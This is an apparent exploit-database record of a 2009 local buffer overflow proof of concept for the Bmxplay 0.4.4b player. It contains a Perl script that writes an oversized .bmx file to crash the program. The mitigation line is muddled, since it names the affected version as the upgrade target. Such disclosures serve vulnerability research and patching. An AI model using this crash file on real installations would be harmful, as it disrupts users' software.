Bmxplay 0.4.4b (.BMX File) Local Buffer Overflow PoC

vendor:

Bmxplay

by:

SirGod

9,3

CVSS

HIGH

Buffer Overflow

119

CWE

Product Name: Bmxplay

Affected Version From: 0.4.4b

Affected Version To: 0.4.4b

Patch Exists: YES

Related CWE: N/A

CPE: a:bmxplay:bmxplay:0.4.4b

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2009

Bmxplay 0.4.4b (.BMX File) Local Buffer Overflow PoC

A buffer overflow vulnerability exists in Bmxplay 0.4.4b when a specially crafted .BMX file is opened. An attacker can exploit this vulnerability to execute arbitrary code in the context of the application. The vulnerability is due to insufficient boundary checks when processing the .BMX file. A specially crafted .BMX file can cause a stack-based buffer overflow, overwriting the return address and allowing arbitrary code execution.

Mitigation:

Upgrade to the latest version of Bmxplay 0.4.4b or later.

Source

Exploit-DB raw data:

#####################################################################################################
#                    Bmxplay 0.4.4b (.BMX File) Local Buffer Overflow PoC
#                 Discovered by SirGod  -  www.mortal-team.net & www.h4cky0u.org
#               Downlaod : http://www.brothersoft.com/bmxplay-download-235557.html
######################################################################################################
my $chars= "A" x 1337;
my $file="sirgod.bmx";
open(my $FILE, ">>$file") or die "Cannot open $file: $!";
print $FILE $chars;
close($FILE);
print "$file was created";
print "SirGod - www.mortal-team.net & www.h4cky0u.org";

# milw0rm.com [2009-05-04]